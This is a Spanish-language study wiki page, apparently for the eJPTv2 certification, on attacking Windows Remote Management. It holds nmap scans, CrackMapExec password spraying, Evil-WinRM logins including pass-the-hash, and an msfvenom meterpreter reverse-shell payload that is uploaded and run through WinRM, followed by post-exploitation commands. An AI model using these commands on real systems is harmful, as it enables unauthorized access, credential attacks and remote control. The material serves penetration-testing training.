HenkoSec
  • 🕷️Whois @HenkoSec ?
  • 📚Diario cyber !
    • 🗃️¿Qué hay por aquí?
  • 🦂WriteUps !
    • ☢️WriteUps | TheHackersLabs
      • 👾FindMe - TheHackersLabs
  • 💯eJPTv2Wiki
    • 🔰Mi experiencia con la eJPTv2
    • 🔍Descubrimiento de HOSTS!
    • 🔍Puerto 21 - FTP
    • 🔍Puerto 22 - SSH
    • 🔍Puerto 25 - SMTP
    • 🔍Puerto 80/443 - HTTP/HTTPS
    • 🔍Puertos - 139,445 SMB
    • 🔍Puerto 1521 - Oracle Database
    • 🔍Puertp - 3306 - MySQL & SqlMap
    • 🔍3389 - RDP
    • 📂WordPress - CMS
    • 📂Drupal - CMS
    • 📂Joomla - CMS
    • 🛠️Gobuster - Fuzzing Web
    • 🛠️Ffuf - Fuzzing Web
    • 🛠️Dirbuster - Fuzzing Web
    • 🛠️John the Ripper - HASH
    • 🛠️Nikto - Escaner Web
    • 🌐Tomcat - Tecnology
    • 🌐Jenkins - Tecnology
    • 🌐Comandos de Red
    • 🌐WinRM
    • 🌐Microsoft IIS - Webshell - windows
    • 📍Servidor Web Local en Python
    • 📍Windows - Post-Explotación
    • ⚙️HotFixed
    • ⚙️TTY - Spawning
    • 📡Pivoting con Metasploit utilizando una máquina Windows
    • 📈Escala de privilegios en Linux
    • 📈Escalada de privilegios en Windows
Powered by GitBook
On this page
  • Windows Remote Management
  • 1. Introducción a WinRM
  • 2. Reconocimiento inicial
  • 3. Verificación del servicio
  • 4. Explotación
  • Usando Evil-WinRM
  • Usando CrackMapExec
  • 5. Post-explotación
  • Comandos útiles en sesión Evil-WinRM
  1. eJPTv2Wiki

WinRM

Windows Remote Management

Índice

  1. Introducción a WinRM

  2. Reconocimiento inicial

  3. Verificación del servicio

  4. Explotación

  5. Post-explotación

  6. Herramientas útiles

  7. Medidas de protección

1. Introducción a WinRM

Windows Remote Management (WinRM) es un servicio de administración remota que utiliza el protocolo WS-Management. Opera por defecto en los puertos 5985 (HTTP) y 5986 (HTTPS).

2. Reconocimiento inicial

Escaneo de puertos

nmap -p5985,5986 -sV <ip_victima>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <ip_victima>

Verificación del servicio WinRM

crackmapexec winrm <ip_victima> -u administrator -p <password_wordlists.txt> # wordlists recomendado: usr/share/metasploit-framework/data/wordlists/unix_paswords.txt

crackmapexec winrm <ip_victima> -u <username> -p <password> -x "<comando_a_ejecutar>" # Cuando tengamos unas credenciales válidas

3. Verificación del servicio

Herramientas principales para verificar la accesibilidad del servicio WinRM:

  • Evil-WinRM: Herramienta especializada para conexiones WinRM

  • CrackMapExec: Para verificar credenciales y acceso

  • Impacket-WmiExec: Para ejecutar comandos remotos

4. Explotación

Usando Evil-WinRM

# Conexión básica
evil-winrm -i <ip_victima> -u<username> -p <password>

# Conexión con hash NT
evil-winrm -i <ip_victima> -u<username> -H <NT-hash>

# Conexión SSL
evil-winrm -i <ip_victima> -u<username> -p <password> -S

Usando CrackMapExec

# Prueba de credenciales
crackmapexec winrm <ip_victima> -u <username> -p <password>

# Password spraying
crackmapexec winrm <ip_victima> -u <username_wordlists> -p <password_wordlists.txt>

5. Post-explotación

Una vez dentro del sistema, algunas acciones comunes:

  • Enumeración de usuarios y grupos locales

  • Búsqueda de archivos sensibles

  • Elevación de privilegios

  • Movimiento lateral

Comandos útiles en sesión Evil-WinRM

# Enumeración básica
whoami /all
net user
systeminfo

# Carga de archivos
upload local_file.exe C:\\Windows\\Temp\\
download C:\\sensitive_file.txt

# Ejecución de scripts PowerShell
Invoke-PowerShellScript.ps1

Obtener una sesión Meterpreter a través de WinRM

Para obtener una sesión Meterpreter usando WinRM, podemos seguir estos pasos:

1. Configuración del payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_victima> LPORT=4444 -f exe -o <nombre_salida.exe>

2. Configurar el handler en Metasploit

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ip_victima>
set LPORT 4444
run

3. Subir y ejecutar el payload usando Evil-WinRM

# Conectar a WinRM
evil-winrm -i <ip_victima> -u <username> -p <password>

# En la sesión de Evil-WinRM
upload reverse.exe C:\\\\Windows\\\\Temp\\\\reverse.exe
start C:\\\\Windows\\\\Temp\\\\reverse.exe

4. Comandos útiles en la sesión Meterpreter

getuid                    # Identificar usuario actual
sysinfo                   # Información del sistema
shell                     # Obtener shell cmd
load powershell          # Cargar extensión PowerShell
ps                       # Listar procesos
migrate <PID>            # Migrar a otro proceso

Este método combina WinRM para el acceso inicial y Meterpreter para post-explotación más avanzada, proporcionando mayor flexibilidad en las operaciones posteriores.

PreviousComandos de RedNextMicrosoft IIS - Webshell - windows

Last updated 3 months ago

💯
🌐